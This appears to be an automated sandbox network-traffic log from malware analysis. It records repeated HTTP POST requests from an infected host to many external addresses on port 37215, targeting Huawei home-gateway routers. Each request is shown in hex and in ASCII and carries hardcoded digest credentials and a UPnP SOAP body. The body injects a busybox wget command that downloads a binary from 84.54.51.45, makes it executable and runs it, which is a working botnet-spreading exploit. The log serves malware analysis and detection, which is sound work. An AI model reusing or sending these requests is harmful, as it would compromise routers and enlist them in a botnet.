                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2051192.168.2.155057441.250.49.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667083025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2052192.168.2.155080441.118.157.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667083025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2053192.168.2.154055641.91.172.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667118073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2054192.168.2.154493241.0.88.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667118073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2055192.168.2.154262441.16.255.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667120934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2056192.168.2.155326041.171.100.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667121887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2057192.168.2.153696641.144.142.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667196035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2058192.168.2.155338641.117.63.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667246103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2059192.168.2.154987041.124.171.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667422056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2060192.168.2.154300441.168.182.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.667481899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 